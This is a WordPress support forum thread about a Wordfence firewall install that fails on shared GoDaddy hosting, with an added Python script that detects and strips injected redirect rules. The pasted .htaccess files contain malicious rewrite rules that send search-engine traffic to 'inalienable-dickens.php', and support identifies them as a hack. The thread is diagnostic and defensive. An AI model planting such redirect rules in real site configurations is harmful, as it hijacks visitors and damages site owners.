/var/chroot/home/content/protect.php
Issue with completing firewall with new version of Wordfence
Please advise
/var/chroot/home/content/protect.php
I’m in the same boat as Mighty Good above ^
Hello Mighty Good,
could you explain the problem you are experiencing a bit more?
Thanks wfasa…
Attempting to engage the firewall aspect of your latest update. On the site in question, I get this message…
The Wordfence Web Application Firewall is designed to run via a PHP ini setting called auto_prepend_file in order to ensure it runs before any potentially vulnerable code runs. This PHP setting is currently in use, and is including this file: /var/chroot/home/content/protect.php
If you don’t recognize this file, please contact us on the WordPress support forums before proceeding. You can proceed with the installation and we will include this from within our wordfence-waf.php file which should maintain compatibility with your site, or you can opt to override the existing PHP setting.
I then click on “Include this file (Recommended)”; and then the following appears…
To be as secure as possible, the Wordfence Web Application Firewall is designed to run via a PHP ini setting called auto_prepend_file in order to ensure it runs before any potentially vulnerable code runs.
NOTE: If you have separate WordPress installations with Wordfence installed within a subdirectory of this site, it is recommended that you perform the Firewall installation procedure on those sites before this one.
We’ve preselected your server configuration based on our tests, but if you know your web server’s configuration, please select it now.
I click Continue; download .htaccess; click continue again and then I get this message…
The changes have not yet taken effect. If you are using LiteSpeed or IIS as your web server or CGI/FastCGI interface, you may need to wait a few minutes for the changes to take effect since the configuration files are sometimes cached. You also may need to select a different server configuration in order to complete this step, but wait for a few minutes before trying. You can try refreshing this page.
I wait but nothing happens; I refresh, nothing happens…
I do not know which server configuration to attempt, as this site is in a shared GoDaddy setup.
I could do the alternate method — but I am so “over” GoDaddy’s lack of support to discover what I need (I have a File Manager, not a cPanel).
Don’t know if you can help, but I sure have given you a lot of info! 🙂
Thanks
Hello Mighty Good,
thank you very much for elaborating. I agree that was a lot of good info! 🙂 If you check in the root of your site can you find any rules related to “Wordfence WAF” in files called .htaccess or .user.ini?
Hi,
There is no note in .htaccess — but there is a line
RewriteRule ^(.*)$ inalienable-dickens.php?$1 [L]
in the one I downloaded when attempting to make the firewall engage.
inalienable-dickens.php has shown up in other error messages on this site — what is it?
in .user.ini — which folder would that be located in? GoDaddy is the host.
Thanks!
Hello again,
I have no idea what “inalienable-dickens” is and it doesn’t turn up much on googling so that doesn’t look very good. It’s possible that that line was written by some malicious code.
user.ini would be in the root of your site.
If you look at your .htaccess right now what does it look like?
Thanks for getting back…
I looked in the /webroot folder and could not locate a user.ini file
There are three different versions of the .htaccess — 2 in the file system, and one that downloads to my computer when I follow the instructions for the firewall…
Copying them all here…
——
.htaccess in /webroot folder last dated 12/17/15
RewriteEngine On
RewriteCond %{ENV:REDIRECT_STATUS} 200
RewriteRule ^ - [L]
RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]
RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)
RewriteRule ^(.*)$ inalienable-dickens.php?$1 [L]
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
———-
also located /webroot/wordpress last dated 05/02/2011 (only file in this sub-folder)
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
——–
And another version downloads to my computer when I follow instructions to setup the firewall
RewriteEngine On
RewriteCond %{ENV:REDIRECT_STATUS} 200
RewriteRule ^ - [L]
RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]
RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)
RewriteRule ^(.*)$ inalienable-dickens.php?$1 [L]
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
—————
Wowser!
Hello Mighty Good,
okay the first one (dated 12/17/15) contains a redirect exploit. What it would do if this file was the one actually being loaded on your site (I can not guarantee that it is since you have several) is that it would redirect all your incoming organic traffic (traffic from search engines) to the file “inalienable-dickens.php”.
So you want to a) check for a file called “inalienable-dickens.php” on your server and remove it if you find it and b) remove everything in that .htaccess above the line
# BEGIN WordPress
Now to your actual question. Your Wordfence firewall can not install because it needs to use auto_prepend_file but auto_prepend_file is already being used to include
/var/chroot/home/content/protect.php. I am assuming the “protect.php” is some kind of firewall but I can not promise you this. The only solution is that you contact your web host and ask them why “protect.php” is included via auto_prepend_file and if they can help you resolve the conflict.
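Added example, not part of the thread and not Wordfence code: a Python check for the pattern described in the reply above (a RewriteRule gated on a search-engine User-Agent or Referer that sends traffic to a PHP file other than index.php), plus step b) of the cleanup. The function names are illustrative and the sample input is the 12/17/15 .htaccess quoted in the thread.

```python
import re

# Constructed input: the 12/17/15 .htaccess exactly as quoted in the thread.
SAMPLE = r"""RewriteEngine On
RewriteCond %{ENV:REDIRECT_STATUS} 200
RewriteRule ^ - [L]
RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]
RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)
RewriteRule ^(.*)$ inalienable-dickens.php?$1 [L]
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
"""

COND = re.compile(r"^\s*RewriteCond\s+%\{([\w:]+)\}\s+(\S+)", re.I)
RULE = re.compile(r"^\s*RewriteRule\s+\S+\s+(\S+)", re.I)
ENGINES = re.compile(r"google|yahoo|bing|msn|aol", re.I)

def find_search_engine_redirects(text):
    """Return (line_no, target) for rules gated on a search-engine UA/referer."""
    findings, pending = [], []
    for n, line in enumerate(text.splitlines(), 1):
        cond, rule = COND.match(line), RULE.match(line)
        if cond:
            pending.append((cond.group(1).upper(), cond.group(2)))
        elif rule:
            gated = any(var in ("HTTP_USER_AGENT", "HTTP_REFERER") and ENGINES.search(pat)
                        for var, pat in pending)
            target = rule.group(1).split("?")[0].lstrip("/")
            if gated and target not in ("-", "index.php"):
                findings.append((n, target))
            pending = []  # RewriteCond lines apply only to the next RewriteRule
    return findings

def strip_above_wordpress_block(text):
    """Step b) from the reply: keep '# BEGIN WordPress' and everything after it."""
    lines = text.splitlines(keepends=True)
    for i, line in enumerate(lines):
        if line.strip() == "# BEGIN WordPress":
            return "".join(lines[i:])
    raise ValueError("no '# BEGIN WordPress' marker found; review the file by hand")

print(find_search_engine_redirects(SAMPLE))
```

Run it against every .htaccess copy on the site, since the thread shows more than one and it is not clear which is live.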
The topic ‘/var/chroot/home/content/protect.php’ is closed to new replies.